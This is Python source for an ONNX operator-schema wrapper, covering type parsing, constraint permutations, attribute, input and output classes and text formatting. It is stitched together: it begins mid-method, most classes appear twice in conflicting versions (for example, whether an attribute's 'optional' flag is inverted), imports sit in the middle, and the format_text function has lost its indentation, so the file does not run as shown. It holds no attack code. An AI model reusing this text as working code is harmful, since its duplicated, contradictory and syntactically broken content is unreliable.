        # (filterOutput -> it is used by an output).
        values = filter(lambda x: (x.input ** filterInput) and (x.output ** filterOutput), self.values())
        tuples = [list(map(lambda x: (c.name,x), c.types)) for c in values]
        return itertools.product(*tuples)

    def typePermutationsMap(self, filterInput=False, filterOutput=False):
        """Build a nested dict keyed by growing tuples of (name, type) pairs."""
        result = {}
        for permutation in self.typePermutationsTuple(filterInput, filterOutput):
            tmp = result
            constraints = []
            for constraint in permutation:
                constraints.append(constraint)
                tmp = tmp.setdefault(tuple(constraints), {})
        return result

    def text(self, prefix=""):
        """Render all constraints separated by blank prefixed lines."""
        paragraphs = [ c.text(prefix) for c in self.values() ]
        return f"\n{prefix}\n".join(paragraphs)

    def __str__(self):
        return self.text()
class OnnxAttribute():
    """One attribute of an ONNX operator schema (name, type, optionality)."""

    # Attribute type name -> generated C enum constant name.
    _onnxAttributeDataType = {
        "UNDEFINED" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__UNDEFINED",
        "FLOAT" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__FLOAT",
        "INT" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__INT",
        "STRING" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__STRING",
        "TENSOR" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__TENSOR",
        "GRAPH" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__GRAPH",
        "SPARSE_TENSOR" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__SPARSE_TENSOR",
        "FLOATS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__FLOATS",
        "INTS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__INTS",
        "STRINGS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__STRINGS",
        "TENSORS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__TENSORS",
        "GRAPHS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__GRAPHS",
        "SPARSE_TENSORS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__SPARSE_TENSORS",
    }

    def __init__(self, name, attribute):
        self.name = name
        if isinstance(attribute, dict):
            self.optional = attribute['optional']
            self.type = attribute['type']
            self.description = attribute['description']
        else:
            # NOTE(review): mapping `required` straight onto `optional` looks
            # inverted — confirm against onnx OpSchema.Attribute semantics.
            self.optional = attribute.required
            self.type = attribute.type.name
            self.description = attribute.description

    def text(self, prefix=""):
        """Render the attribute as indented human-readable text."""
        # BUG FIX: the original nested double quotes inside a double-quoted
        # f-string ({"(optional)"*self.optional}) — a SyntaxError before
        # Python 3.12; build the marker outside the f-string instead.
        optional_marker = "(optional)" * self.optional
        lines = []
        lines.append(f"{prefix}Attribute {self.type} {self.name} {optional_marker}:")
        lines.append(format_text(prefix + " ", None, [self.description]))
        return "\n".join(lines)

    def onnxAttributeDataType(self):
        """Return the C enum constant for this attribute's type."""
        return self._onnxAttributeDataType[self.type]

    def __repr__(self):
        attribute = self.__dict__.copy()
        del attribute['name']
        return f"OnnxAttribute({self.name.__repr__()}, {attribute.__repr__()})"

    def __str__(self):
        return self.text()
class OnnxAttributeList(list):
    """All attributes of one operator schema, wrapped as OnnxAttribute."""

    def __init__(self, schema):
        # NOTE(review): bare `super()` is a no-op; `super().__init__()` intended.
        super()
        for name,attribute in schema.attributes.items():
            self.append(OnnxAttribute(name, attribute))

    def text(self, prefix=""):
        """Render all attributes separated by blank prefixed lines."""
        paragraphs = [ a.text(prefix) for a in self ]
        return f"\n{prefix}\n".join(paragraphs)

    def __str__(self):
        return self.text()
class OnnxInput():
    """One input of an ONNX operator schema.

    Accepts either an already-serialized dict or an onnx OpSchema formal
    parameter object.
    """

    def __init__(self, input):
        if isinstance(input, dict):
            self.name = input['name']
            self.description = input['description']
            self.isHomogeneous = input['isHomogeneous']
            self.optional = input['optional']
            self.variadic = input['variadic']
            self.constraint = input['constraint']
            self.types = input['types']
        else:
            self.name = input.name
            self.description = input.description.strip()
            self.isHomogeneous = input.isHomogeneous
            # `option` is the Single/Optional/Variadic enum of the parameter.
            self.optional = (input.option.name == "Optional")
            self.variadic = (input.option.name == "Variadic")
            self.constraint = input.typeStr
            self.types = OnnxTypeList(input.types)

    def text(self, prefix=""):
        """Render the input as indented human-readable text."""
        lines = []
        lines.append(f"{prefix}Input {self.constraint} {self.name}:")
        lines.append(format_text(prefix + " ", "", [self.description]))
        lines.append(format_text(prefix + " ", "Allowed Types:", [str(self.types)]))
        return "\n".join(lines)

    def __repr__(self):
        return f"OnnxInput({self.__dict__.__repr__()})"

    def __str__(self):
        return self.text()
class OnnxInputList(list):
    """All inputs of one operator schema, wrapped as OnnxInput."""

    def __init__(self, schema):
        # NOTE(review): bare `super()` is a no-op; `super().__init__()` intended.
        super()
        self.extend([ OnnxInput(i) for i in schema.inputs])

    def text(self, prefix=""):
        """Render all inputs separated by blank prefixed lines."""
        paragraphs = [ i.text(prefix) for i in self ]
        return f"\n{prefix}\n".join(paragraphs)

    def __str__(self):
        return self.text()
class OnnxOutput():
    """One output of an ONNX operator schema.

    Accepts either an already-serialized dict or an onnx OpSchema formal
    parameter object.
    """

    def __init__(self, output):
        if isinstance(output, dict):
            self.name = output['name']
            self.description = output['description']
            self.isHomogeneous = output['isHomogeneous']
            self.optional = output['optional']
            self.variadic = output['variadic']
            self.constraint = output['constraint']
            self.types = output['types']
        else:
            self.name = output.name
            # NOTE(review): unlike OnnxInput the description is not .strip()ed
            # here — confirm whether that asymmetry is intentional.
            self.description = output.description
            self.isHomogeneous = output.isHomogeneous
            # `option` is the Single/Optional/Variadic enum of the parameter.
            self.optional = (output.option.name == "Optional")
            self.variadic = (output.option.name == "Variadic")
            self.constraint = output.typeStr
            self.types = OnnxTypeList(output.types)

    def text(self, prefix=""):
        """Render the output as indented human-readable text."""
        lines = []
        lines.append(f"{prefix}Output {self.constraint} {self.name}:")
        lines.append(format_text(prefix + " ", None, [self.description]))
        lines.append(format_text(prefix + " ", "Allowed Types:", [str(self.types)]))
        return "\n".join(lines)

    def __repr__(self):
        # CONSISTENCY FIX: match OnnxInput/OnnxConstraint, which wrap the dict
        # repr in their class name; previously this returned the bare dict repr.
        return f"OnnxOutput({self.__dict__.__repr__()})"

    def __str__(self):
        return self.text()
class OnnxOutputList(list):
    """All outputs of one operator schema, wrapped as OnnxOutput."""

    def __init__(self, schema):
        # NOTE(review): bare `super()` is a no-op; `super().__init__()` intended.
        super()
        self.extend([ OnnxOutput(i) for i in schema.outputs])

    def text(self, prefix=""):
        """Render all outputs separated by blank prefixed lines."""
        paragraphs = [ i.text(prefix) for i in self ]
        return f"\n{prefix}\n".join(paragraphs)

    def __str__(self):
        return self.text()
class OnnxDoc():
    """Free-form documentation text attached to an ONNX operator schema."""

    def __init__(self, schema):
        # Accept either the raw doc string or a schema object carrying one.
        self.doc = schema if isinstance(schema, str) else schema.doc.strip()

    def __repr__(self):
        return f"OnnxDoc({self.doc!r})"

    def text(self, prefix=" * "):
        """Render the doc with *prefix* prepended to every line."""
        doc_lines = self.doc.split('\n')
        return prefix + f"\n{prefix}".join(doc_lines)

    def __str__(self):
        return self.text()
class OnnxSchema():
    """Language-neutral snapshot of one ONNX operator schema.

    Accepts either a serialized dict (restored via __dict__.update) or an
    onnx OpSchema object, which is decomposed into the plain wrapper objects
    defined above.
    """

    def __init__(self, schema):
        # Declare every field up front so the dict branch cannot leave holes.
        self.name = None
        self.doc = None
        self.deprecated = None
        self.operator_name = None
        self.version = None
        self.domain = None
        self.constraints = None
        self.attributes = None
        self.inputs = None
        self.outputs = None
        self.ref_doc = None
        self.range_input = None
        self.range_output = None
        self.ref_file = None
        self._schema = None
        if isinstance(schema, dict):
            self.__dict__.update(schema)
        else:
            self.doc = OnnxDoc(schema)
            self.name = schema.name
            self.deprecated = schema.deprecated
            self.operator_name = self._operator_name(schema)
            self.version = schema.since_version
            self.domain = self._domain(schema)
            self.constraints = OnnxConstraints(schema)
            self.attributes = OnnxAttributeList(schema)
            self.inputs = OnnxInputList(schema)
            self.outputs = OnnxOutputList(schema)
            self.ref_doc = self._ref_doc(schema)
            # (min, max) arity of inputs and outputs.
            self.range_input = (schema.min_input, schema.max_input)
            self.range_output = (schema.min_output, schema.max_output)
            self.ref_file = (schema.file,schema.line)
            self._schema = schema

    def __repr__(self):
        return f"OnnxSchema({self.__dict__.__repr__()})"

    def _operator_name(self, schema):
        """Build a C-identifier-safe operator name: operator__domain__name__version."""
        name = f"operator__{self._domain(schema)}__{schema.name}__{schema.since_version}"
        return re.sub(r"\W", "_", name).lower()

    def _domain(self, schema):
        """Return the schema's domain, defaulting to "onnx" when empty."""
        domain = "onnx"
        if schema.domain:
            domain = schema.domain
        return domain.strip()

    def _ref_doc(self, schema):
        """Return the URL of the upstream operator documentation, if known."""
        domain = self._domain(schema)
        if domain == 'onnx':
            return f"https://github.com/onnx/onnx/blob/master/docs/Operators.md#{schema.name}"
        elif domain == 'ai.onnx.ml':
            return f"https://github.com/onnx/onnx/blob/master/docs/Operators-ml.md#{schema.name}"
        else:
return ''
import re
import itertools
def format_text(prefix, start, texts):
output = []
curr = []
if start:
curr.append(start)
linebreaks = 0
for text in texts:
lines = []
length = len(prefix)
if start:
length += + len(start)
# split text into words by splitting on space and remove empty splits ("")
# then split on newline boundaries, but keep empty splits ("\n\n")
words = [w.split("\n") for w in text.strip().split(" ") if w != ""]
words = list(itertools.chain(*words))
for w in words:
if w.strip() == "":
if linebreaks == 0:
linebreaks += 1
continue
if linebreaks >= 2:
# we already did 2 line breaks, skip this one
continue
# empty split, caused by "\n\n", should cause single line break
linebreaks += 1
length = len(prefix)
lines.append(prefix + " ".join(curr))
curr = []
if start:
length += len(start)
curr.append(" "*len(start))
continue
else:
linebreaks = 0
if length + len(w) < 79:
# keep adding words
length += len(w) + 1
curr.append(w)
continue
# line is full, do line break
length = len(prefix) + len(w)
lines.append(prefix + " ".join(curr))
curr = []
if start:
length += len(start)
curr.append(" "*len(start))
curr.append(w)
lines.append(prefix + " ".join(curr))
curr = []
if start:
curr.append(" "*len(start))
output.append("\n".join(lines))
return "\n".join(output)
class OnnxType(dict):
    """Parsed ONNX type string such as "tensor(float)" or
    "map(string, tensor(int64))".

    The instance IS the parse tree: a dict mapping the container kind
    ("tensor"/"map"/"seq") to its payload — a terminal type name, a nested
    dict, or (for maps) a (key, value) tuple.

    Fixes over the original: the tokenizer's bare `except:` now catches only
    the ValueError that max() raises on "no match" (a bare except also
    swallowed KeyboardInterrupt/SystemExit); the constructor calls
    `super().__init__()` instead of the no-op bare `super()`; internal
    walkers raise TypeError instead of BaseException (TypeError is still
    caught by any pre-existing `except BaseException` handler).
    """

    # terminal type name -> C enum constant of the protobuf tensor data type
    _onnxTensorDataType = {
        "float": "ONNX__TENSOR_PROTO__DATA_TYPE__FLOAT",
        "uint8": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT8",
        "int8": "ONNX__TENSOR_PROTO__DATA_TYPE__INT8",
        "uint16": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT16",
        "int16": "ONNX__TENSOR_PROTO__DATA_TYPE__INT16",
        "int32": "ONNX__TENSOR_PROTO__DATA_TYPE__INT32",
        "int64": "ONNX__TENSOR_PROTO__DATA_TYPE__INT64",
        "string": "ONNX__TENSOR_PROTO__DATA_TYPE__STRING",
        "bool": "ONNX__TENSOR_PROTO__DATA_TYPE__BOOL",
        "float16": "ONNX__TENSOR_PROTO__DATA_TYPE__FLOAT16",
        "double": "ONNX__TENSOR_PROTO__DATA_TYPE__DOUBLE",
        "uint32": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT32",
        "uint64": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT64",
        "complex64": "ONNX__TENSOR_PROTO__DATA_TYPE__COMPLEX64",
        "complex128": "ONNX__TENSOR_PROTO__DATA_TYPE__COMPLEX128",
        "bfloat16": "ONNX__TENSOR_PROTO__DATA_TYPE__BFLOAT16",
    }

    class _Scanner:
        """Greedy longest-match tokenizer for ONNX type strings."""

        # compiled pattern -> token name; whitespace maps to None and is dropped.
        # Longest match wins, so "float16" beats the "float" prefix.
        _tokens = {
            re.compile(r"tensor") : "tensor" ,
            re.compile(r"map") : "map" ,
            re.compile(r"seq") : "seq" ,
            re.compile(r"\(") : "(" ,
            re.compile(r"\)") : ")" ,
            re.compile(r"float") : "float" ,
            re.compile(r"uint8") : "uint8" ,
            re.compile(r"int8") : "int8" ,
            re.compile(r"uint16") : "uint16" ,
            re.compile(r"int16") : "int16" ,
            re.compile(r"int32") : "int32" ,
            re.compile(r"int64") : "int64" ,
            re.compile(r"string") : "string" ,
            re.compile(r"bool") : "bool" ,
            re.compile(r"float16") : "float16" ,
            re.compile(r"double") : "double" ,
            re.compile(r"uint32") : "uint32" ,
            re.compile(r"uint64") : "uint64" ,
            re.compile(r"complex64") : "complex64" ,
            re.compile(r"complex128") : "complex128",
            re.compile(r"bfloat16") : "bfloat16" ,
            re.compile(r",") : "," ,
            re.compile(r"\s+") : None ,
        }

        def __init__(self, string):
            self.string = string
            self.tokens = self.tokenize(string)

        def tokenize(self, string):
            """Split `string` into tokens, always consuming the longest match."""
            pos = 0
            tokens = []
            while string[pos:]:
                allMatches = map(lambda x: (x[0].match(string[pos:]), x[1]), self._tokens.items())
                validMatches = filter(lambda x: x[0], allMatches)
                try:
                    longestMatch = max(validMatches, key=lambda x: x[0].end())
                except ValueError:
                    # BUG FIX: was a bare `except:`.  max() raises ValueError
                    # when no pattern matched at this position.
                    raise SyntaxError(f"no token matches: '{string[pos:]}'")
                else:
                    pos += longestMatch[0].end()
                    if longestMatch[1]:
                        tokens.append(longestMatch[1])
            return tokens

        def consume(self, expected_token=None):
            """Pop the next token; if `expected_token` is given, require it."""
            if not expected_token:
                return self.pop()
            if not self.peek(expected_token):
                raise SyntaxError(
                    f"expected '{expected_token}', but got '{self.peek()}'")
            return self.pop()

        def peek(self, expected_token=None):
            """Look at the next token; with an argument, test it instead."""
            token = self.tokens[0]
            if expected_token:
                return token == expected_token
            else:
                return token

        def pop(self):
            return self.tokens.pop(0)

        def onToken(self, token2function, consume=False):
            """Dispatch on the next token via `token2function`, optionally
            consuming it first; raise SyntaxError when nothing matches."""
            for token, function in token2function.items():
                if self.peek(token):
                    if consume:
                        self.pop()
                    return function()
            tokens = ", ".join([f"'{t}'" for t in token2function.keys()])
            raise SyntaxError(f"expected one of {tokens}, but got '{self.peek()}'")

        def __repr__(self):
            return f"OnnxType._Scanner({self.string.__repr__()})"

    class _Parser:
        """Recursive-descent parser over _Scanner tokens."""

        # terminal token -> producer of its parse-tree leaf (the name itself)
        _terminals = {
            "float": lambda: "float",
            "uint8": lambda: "uint8",
            "int8": lambda: "int8",
            "uint16": lambda: "uint16",
            "int16": lambda: "int16",
            "int32": lambda: "int32",
            "int64": lambda: "int64",
            "string": lambda: "string",
            "bool": lambda: "bool",
            "float16": lambda: "float16",
            "double": lambda: "double",
            "uint32": lambda: "uint32",
            "uint64": lambda: "uint64",
            "complex64": lambda: "complex64",
            "complex128": lambda: "complex128",
            "bfloat16": lambda: "bfloat16",
        }

        def __init__(self, scanner):
            self.scanner = scanner

        def __repr__(self):
            return f"OnnxType._Parser({self.scanner.__repr__()})"

        def _rule_tensor(self):
            # tensor ::= "tensor" "(" terminal ")"   (the "tensor" token is
            # consumed by the caller's onToken dispatch)
            self.scanner.consume('(')
            result = self.scanner.onToken(self._terminals, consume=True)
            self.scanner.consume(')')
            return {"tensor": result}

        def _rule_map(self):
            # map ::= "map" "(" terminal "," (tensor|map|seq|terminal) ")"
            rules = {
                "tensor": self._rule_tensor,
                "map": self._rule_map,
                "seq": self._rule_seq,
            }
            rules.update(self._terminals)
            self.scanner.consume('(')
            key = self.scanner.onToken(self._terminals, consume=True)
            self.scanner.consume(',')
            value = self.scanner.onToken(rules, consume=True)
            self.scanner.consume(')')
            return {"map": (key, value)}

        def _rule_seq(self):
            # seq ::= "seq" "(" (tensor|map|seq|terminal) ")"
            rules = {
                "tensor": self._rule_tensor,
                "map": self._rule_map,
                "seq": self._rule_seq
            }
            rules.update(self._terminals)
            self.scanner.consume('(')
            result = self.scanner.onToken(rules, consume=True)
            self.scanner.consume(')')
            return {"seq": result}

        def parse(self):
            """Parse one complete type expression and return its tree."""
            rules = {
                "tensor": self._rule_tensor,
                "map": self._rule_map,
                "seq": self._rule_seq,
            }
            return self.scanner.onToken(rules, consume=True)

    def __init__(self, typeStr):
        # BUG FIX: bare `super()` was a no-op; call dict.__init__ properly.
        super().__init__()
        self.original = typeStr
        scanner = self._Scanner(typeStr)
        parser = self._Parser(scanner)
        self.update(parser.parse())

    def __str__(self):
        return self._text_walkParseTree(self)

    def __repr__(self):
        return f"OnnxType({self.original.__repr__()})"

    def _text_walkParseTree(self, node):
        """Flatten the tree into an identifier: underscores join a container
        to its payload, double underscores join siblings."""
        if isinstance(node, str):
            return node.replace("_", "")
        elif isinstance(node, dict):
            subresults = []
            for key, val in node.items():
                subresults.append(key + "_" + self._text_walkParseTree(val))
            return "__".join(subresults)
        elif isinstance(node, tuple):
            return "__".join([self._text_walkParseTree(t) for t in node])
        else:
            # FIX: was BaseException; TypeError is the appropriate category
            raise TypeError(f"unknown parseTree item: '{node}'")

    def onnxTensorDataTypes(self):
        """Enum constants for every tensor(...) element type in the tree;
        non-tensor terminals (e.g. map keys) are skipped."""
        results = []
        self._onnxTensorDataType_walkParseTree(self, results)
        return list(filter(None, results))

    def _onnxTensorDataType_walkParseTree(self, node, results):
        if isinstance(node, str):
            # bare terminal outside a tensor(...) -> placeholder, filtered out
            results.append(None)
        elif isinstance(node, dict):
            for key, val in node.items():
                if key == "tensor":
                    results.append(self._onnxTensorDataType[val])
                else:
                    self._onnxTensorDataType_walkParseTree(val, results)
        elif isinstance(node, tuple):
            for val in node:
                self._onnxTensorDataType_walkParseTree(val, results)
        else:
            # FIX: was BaseException
            raise TypeError(f"unknown parseTree item: '{node}'")

    def __hash__(self):
        # hash on the source string so equal type strings collide as expected
        return self.original.__hash__()
class OnnxTypeList(list):
    """Sorted list of OnnxType objects built from an iterable of type strings."""

    def __init__(self, typeList):
        # BUG FIX: bare `super()` was a no-op; call list.__init__ properly.
        super().__init__()
        # sort the raw strings first so the parsed list is deterministic
        self.extend([OnnxType(t) for t in sorted(typeList)])

    def __str__(self):
        return ", ".join([f"{t}" for t in self])

    def __repr__(self):
        types = ", ".join([t.original.__repr__() for t in self])
        return f"OnnxTypeList([{types}])"
class OnnxConstraint():
    """A named type constraint (e.g. "T") with its allowed types and whether
    it is referenced by an input and/or an output."""

    def __init__(self, constraint, input=False, output=False):
        if isinstance(constraint, dict):
            # rehydrate from a previously serialized attribute dict
            for key in ('types', 'description', 'name', 'input', 'output'):
                setattr(self, key, constraint[key])
        else:
            # build from a live OpSchema type-constraint parameter
            self.types = OnnxTypeList(constraint.allowed_type_strs)
            self.description = constraint.description
            self.name = constraint.type_param_str
            self.input = input
            self.output = output

    def text(self, prefix=""):
        """Render as a "Constraint <name>:" header plus wrapped description
        and allowed-types paragraphs."""
        indent = prefix + "  "
        header = f"{prefix}Constraint {self.name}:"
        body = format_text(indent, "", [self.description])
        allowed = format_text(indent, "Allowed Types:", [str(self.types)])
        return "\n".join([header, body, allowed])

    def __repr__(self):
        return f"OnnxConstraint({self.__dict__.__repr__()})"
class OnnxConstraints(dict):
    """Maps constraint name -> OnnxConstraint for one operator schema,
    recording whether each constraint is used by an input and/or output."""

    def __init__(self, schema):
        # NOTE(review): bare `super()` is a no-op here; dict needs no explicit
        # __init__, so behavior is unaffected.
        super()
        # names of all declared constraints ...
        constraints = {c.type_param_str for c in schema.type_constraints}
        # ... and which of them actually appear on inputs / outputs
        inputs = {i.typeStr for i in schema.inputs if i.typeStr in constraints}
        outputs = {o.typeStr for o in schema.outputs if o.typeStr in constraints}
        for constraint in schema.type_constraints:
            self[constraint.type_param_str] = OnnxConstraint(constraint, input=constraint.type_param_str in inputs, output=constraint.type_param_str in outputs)

    def typePermutations(self, filterInput=False, filterOutput=False):
        """All permutation names (see typePermutationText), empties dropped."""
        return list(filter(None,(self.typePermutationText(p) for p in self.typePermutationsTuple(filterInput,filterOutput))))

    def typePermutationText(self, permutation):
        # ((name, type), ...) -> "name1_type1__name2_type2__..."
        return "__".join([ f"{x[0]}_{x[1]}" for x in permutation ])

    def typePermutationsTuple(self, filterInput=False, filterOutput=False):
        # Keep x when (filterInput implies x.input) and (filterOutput implies
        # x.output).  For bools, "b implies a" equals a ** b (1**0 == 1 and
        # 0**1 == 0), so `x.input ** filterInput` is exactly
        # "filterInput -> x.input".  (The original comment stated the
        # implication backwards.)
        values = filter(lambda x: (x.input ** filterInput) and (x.output ** filterOutput), self.values())
        # one (constraint-name, allowed-type) pair per type, per constraint;
        # the cartesian product enumerates every concrete type assignment
        tuples = [list(map(lambda x: (c.name,x), c.types)) for c in values]
        return itertools.product(*tuples)

    def typePermutationsMap(self, filterInput=False, filterOutput=False):
        """Nested dict whose keys are growing tuples of (name, type) pairs —
        one nesting level per constraint of the permutation."""
        result = {}
        for permutation in self.typePermutationsTuple(filterInput, filterOutput):
            tmp = result
            constraints = []
            for constraint in permutation:
                constraints.append(constraint)
                # descend (creating levels on demand) keyed by the prefix tuple
                tmp = tmp.setdefault(tuple(constraints), {})
        return result

    def text(self, prefix=""):
        """Concatenate every constraint's text block."""
        paragraphs = [ c.text(prefix) for c in self.values() ]
        return f"\n{prefix}\n".join(paragraphs)

    def __str__(self):
        return self.text()
class OnnxAttribute():
    """One attribute of an ONNX operator schema."""

    # attribute type name -> C enum constant of the protobuf attribute type
    _onnxAttributeDataType = {
        "UNDEFINED" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__UNDEFINED",
        "FLOAT" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__FLOAT",
        "INT" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__INT",
        "STRING" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__STRING",
        "TENSOR" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__TENSOR",
        "GRAPH" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__GRAPH",
        "SPARSE_TENSOR" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__SPARSE_TENSOR",
        "FLOATS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__FLOATS",
        "INTS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__INTS",
        "STRINGS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__STRINGS",
        "TENSORS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__TENSORS",
        "GRAPHS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__GRAPHS",
        "SPARSE_TENSORS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__SPARSE_TENSORS",
    }

    def __init__(self, name, attribute):
        self.name = name
        if isinstance(attribute, dict):
            # rehydrate from a serialized attribute dict
            self.optional = attribute['optional']
            self.type = attribute['type']
            self.description = attribute['description']
        else:
            # BUG FIX: the original set `optional = attribute.required`,
            # inverting the flag — text() then labeled every *required*
            # attribute "(optional)".  OpSchema.Attribute.required is True
            # when the attribute is mandatory.
            self.optional = not attribute.required
            self.type = attribute.type.name
            self.description = attribute.description

    def text(self, prefix=""):
        """Render as "Attribute <type> <name> [(optional)]:" plus wrapped
        description."""
        lines = []
        lines.append(f"{prefix}Attribute {self.type} {self.name} {'(optional)'*self.optional}:")
        lines.append(format_text(prefix + "  ", None, [self.description]))
        return "\n".join(lines)

    def onnxAttributeDataType(self):
        """Map this attribute's type name to its C enum constant."""
        return self._onnxAttributeDataType[self.type]

    def __repr__(self):
        attribute = self.__dict__.copy()
        del attribute['name']
        return f"OnnxAttribute({self.name.__repr__()}, {attribute.__repr__()})"

    def __str__(self):
        return self.text()
class OnnxAttributeList(list):
    """List of OnnxAttribute wrappers built from schema.attributes."""

    def __init__(self, schema):
        # BUG FIX: bare `super()` was a no-op; call list.__init__ properly.
        super().__init__()
        self.extend(OnnxAttribute(name, attribute)
                    for name, attribute in schema.attributes.items())

    def text(self, prefix=""):
        """Concatenate each attribute's text block."""
        paragraphs = [a.text(prefix) for a in self]
        return f"\n{prefix}\n".join(paragraphs)

    def __str__(self):
        return self.text()
class OnnxInput():
    """One formal input of an ONNX operator."""

    def __init__(self, input):
        if isinstance(input, dict):
            # rehydrate from a serialized attribute dict
            for key in ('name', 'description', 'isHomogeneous', 'optional',
                        'variadic', 'constraint', 'types'):
                setattr(self, key, input[key])
        else:
            # build from a live OpSchema formal parameter
            self.name = input.name
            self.description = input.description.strip()
            self.isHomogeneous = input.isHomogeneous
            self.optional = (input.option.name == "Optional")
            self.variadic = (input.option.name == "Variadic")
            self.constraint = input.typeStr
            self.types = OnnxTypeList(input.types)

    def text(self, prefix=""):
        """Render as an "Input <constraint> <name>:" header plus wrapped
        description and allowed-types paragraphs."""
        indent = prefix + "  "
        header = f"{prefix}Input {self.constraint} {self.name}:"
        body = format_text(indent, "", [self.description])
        allowed = format_text(indent, "Allowed Types:", [str(self.types)])
        return "\n".join([header, body, allowed])

    def __repr__(self):
        return f"OnnxInput({self.__dict__.__repr__()})"

    def __str__(self):
        return self.text()
class OnnxInputList(list):
    """List of OnnxInput wrappers built from schema.inputs."""

    def __init__(self, schema):
        # BUG FIX: bare `super()` was a no-op; call list.__init__ properly.
        super().__init__()
        self.extend([OnnxInput(i) for i in schema.inputs])

    def text(self, prefix=""):
        """Concatenate each input's text block."""
        paragraphs = [i.text(prefix) for i in self]
        return f"\n{prefix}\n".join(paragraphs)

    def __str__(self):
        return self.text()
class OnnxOutput():
    """One formal output of an ONNX operator."""

    def __init__(self, output):
        if isinstance(output, dict):
            # rehydrate from a serialized attribute dict
            self.name = output['name']
            self.description = output['description']
            self.isHomogeneous = output['isHomogeneous']
            self.optional = output['optional']
            self.variadic = output['variadic']
            self.constraint = output['constraint']
            self.types = output['types']
        else:
            # build from a live OpSchema formal parameter
            self.name = output.name
            # CONSISTENCY FIX: strip the description like OnnxInput does.
            self.description = output.description.strip()
            self.isHomogeneous = output.isHomogeneous
            self.optional = (output.option.name == "Optional")
            self.variadic = (output.option.name == "Variadic")
            self.constraint = output.typeStr
            self.types = OnnxTypeList(output.types)

    def text(self, prefix=""):
        """Render as an "Output <constraint> <name>:" header plus wrapped
        description and allowed-types paragraphs."""
        lines = []
        lines.append(f"{prefix}Output {self.constraint} {self.name}:")
        lines.append(format_text(prefix + "  ", None, [self.description]))
        lines.append(format_text(prefix + "  ", "Allowed Types:", [str(self.types)]))
        return "\n".join(lines)

    def __repr__(self):
        # CONSISTENCY FIX: include the class name like OnnxInput.__repr__
        # (the bare attribute-dict repr was ambiguous in mixed dumps).
        return f"OnnxOutput({self.__dict__.__repr__()})"

    def __str__(self):
        return self.text()
class OnnxOutputList(list):
    """List of OnnxOutput wrappers built from schema.outputs."""

    def __init__(self, schema):
        # BUG FIX: bare `super()` was a no-op; call list.__init__ properly.
        super().__init__()
        self.extend([OnnxOutput(i) for i in schema.outputs])

    def text(self, prefix=""):
        """Concatenate each output's text block."""
        paragraphs = [i.text(prefix) for i in self]
        return f"\n{prefix}\n".join(paragraphs)

    def __str__(self):
        return self.text()
class OnnxDoc():
    """Operator documentation text, from a plain string or from a schema
    object's stripped `doc` attribute."""

    def __init__(self, schema):
        if isinstance(schema, str):
            self.doc = schema
        else:
            self.doc = schema.doc.strip()

    def __repr__(self):
        return f"OnnxDoc({self.doc.__repr__()})"

    def text(self, prefix=" * "):
        """Prefix each documentation line (comment-banner style by default)."""
        prefixed = (prefix + line for line in self.doc.split('\n'))
        return "\n".join(prefixed)

    def __str__(self):
        return self.text()
class OnnxSchema():
    """Snapshot of an ONNX operator schema.

    Accepts either a live onnx OpSchema object or a dict produced by an
    earlier serialization of this class (rehydration).
    """

    def __init__(self, schema):
        # default every field first, so the dict branch can simply update
        # __dict__ and missing keys stay None
        for field in ('name', 'doc', 'deprecated', 'operator_name', 'version',
                      'domain', 'constraints', 'attributes', 'inputs',
                      'outputs', 'ref_doc', 'range_input', 'range_output',
                      'ref_file', '_schema'):
            setattr(self, field, None)
        if isinstance(schema, dict):
            self.__dict__.update(schema)
        else:
            self.doc = OnnxDoc(schema)
            self.name = schema.name
            self.deprecated = schema.deprecated
            self.operator_name = self._operator_name(schema)
            self.version = schema.since_version
            self.domain = self._domain(schema)
            self.constraints = OnnxConstraints(schema)
            self.attributes = OnnxAttributeList(schema)
            self.inputs = OnnxInputList(schema)
            self.outputs = OnnxOutputList(schema)
            self.ref_doc = self._ref_doc(schema)
            self.range_input = (schema.min_input, schema.max_input)
            self.range_output = (schema.min_output, schema.max_output)
            self.ref_file = (schema.file, schema.line)
            self._schema = schema

    def __repr__(self):
        return f"OnnxSchema({self.__dict__.__repr__()})"

    def _operator_name(self, schema):
        """Identifier-safe lowercase name: operator__<domain>__<name>__<version>."""
        raw = f"operator__{self._domain(schema)}__{schema.name}__{schema.since_version}"
        return re.sub(r"\W", "_", raw).lower()

    def _domain(self, schema):
        """The schema's domain, defaulting to 'onnx' when unset."""
        return (schema.domain or "onnx").strip()

    def _ref_doc(self, schema):
        """URL of the operator's entry in the official ONNX markdown docs."""
        domain = self._domain(schema)
        if domain == 'onnx':
            return f"https://github.com/onnx/onnx/blob/master/docs/Operators.md#{schema.name}"
